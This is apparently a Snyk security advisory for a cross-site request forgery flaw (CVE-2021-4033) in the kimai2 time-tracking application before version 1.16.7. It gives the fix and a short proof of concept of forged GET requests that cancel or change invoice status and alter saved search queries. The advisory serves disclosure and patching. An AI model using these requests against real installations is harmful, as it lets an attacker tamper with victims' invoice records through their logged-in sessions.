Cross-site Request Forgery (CSRF) Affecting kevinpapst/kimai2 package, versions <1.16.7


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

EPSS
0.07% (34th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Cross-site Request Forgery (CSRF) vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-PHP-KEVINPAPSTKIMAI2-2314882
  • published10 Dec 2021
  • disclosed10 Dec 2021
  • creditUnknown

Introduced: 10 Dec 2021

CVE-2021-4033  (opens in a new tab)
CWE-352  (opens in a new tab)

How to fix?

Upgrade kevinpapst/kimai2 to version 1.16.7 or higher.

Overview

kevinpapst/kimai2 is a web-based multiuser time-tracking application.

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) via the endpoints for saving/modifying invoices and adding/deleting search favourites.

PoC

GET /en/invoice/change-status/2/canceled
GET /en/invoice/change-status/2/pending
GET /en/invoice/?createInvoice=true&searchTerm=&daterange=2021-11-01%20-%202021-11-30&tags=&exported=5&template=5   (save all invoices)
GET /en/invoice/?removeDefaultQuery=InvoiceQuery
GET /en/invoice/?searchTerm=&daterange=2021-11-01+-+2021-11-30&tags=&exported=5&template=5&setDefaultQuery=

References

CVSS Scores

version 3.1